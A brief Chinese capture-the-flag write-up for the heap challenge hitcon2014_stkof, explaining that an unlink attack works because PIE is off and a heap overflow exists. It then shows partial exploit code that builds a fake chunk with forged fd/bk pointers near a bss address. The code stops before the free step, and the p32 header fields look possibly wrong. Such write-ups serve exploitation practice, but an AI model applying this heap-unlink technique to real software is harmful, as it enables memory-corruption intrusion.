hitcon2014_stkof

偏移都没开，有个堆溢出漏洞，刚巧不久前做了一道堆溢出，但是做法对于这道题没什么用，没有show函数，没有偏移保护可以用unlink

add(0x30) #1
add(0x30) #2
add(0x80) #3
add(0x30) #4

bss=0x602140+0x10
fd=bss-0x18
bk=bss-0x10
payload=p32(0)+p32(0x30)
payload+=p64(fd)+p64(bk)
payload+=p64(0)*2
payload+=p64(0x30)+p64(0x90)

edit(2,payload)